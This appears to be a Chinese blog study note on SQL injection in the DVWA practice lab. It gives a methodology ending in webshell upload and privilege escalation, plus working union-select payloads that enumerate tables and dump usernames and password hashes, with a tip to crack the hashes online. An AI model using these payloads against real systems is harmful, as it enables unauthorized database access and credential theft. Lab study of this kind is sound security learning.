zoukankan      html  css  js  c++  java
  • DVWA-SQL注入

    SQL注入解题思路

    1. 寻找注入点,可以通过web扫描工具实现
    2. 通过注入点,尝试得到连接数据库的用户名,数据库名称,权限等信息。
    3. 猜解关键数据库表极其重要字段与内容。
    4. 通过获得的用户信息寻找后台进行登录。
    5. 利用后台上传webshell或一句话木马,进一步提权拿到服务器权限。

    1.随便输入id 1,2,3…… 进行测试,发现输入正确的ID会返回First name和Sumame信息,输入错误的id不会返回信息

    2.使用 1'or'1'='1 遍历出数据库表中的所有内容。

    3.此时我们可以通过使用user(),database(),version()三个内置函数使用 1' and 1=2 union select user(),database() --  (注意插入的命令的格式以及空格)得到连接数据库的账户名,数据库名称,数据库版本信息。

    4.猜测表名,通过注入 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema =database()# 

    5.猜测列名,通过注入 1' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users'# 

    6.猜测用户密码,通过注入 1' union select null,concat_ws(char(32,58,32),user,password) from users #  

    7.得到的用户后的字符串为哈希值,可以登陆 https://cmd5.com/ 对MD5进行在线破解为明文密码。

    文章仅作为学习笔记,欢迎指正,不喜勿喷!
  • 相关阅读:
    组件库设计
    kill 3000
    nextjs服务端渲染原理
    Web交互增强
    webpack4.0打包的时候一些技巧
    把网站部署到阿里云上的步骤
    typescript使用小结
    webpack 4.0尝鲜
    基于Quick-cocos2d-x的资源更新方案 二
    Android APK是否需要预解压
  • 原文地址:https://www.cnblogs.com/Hunter-01001100/p/10975977.html
Copyright © 2011-2022 走看看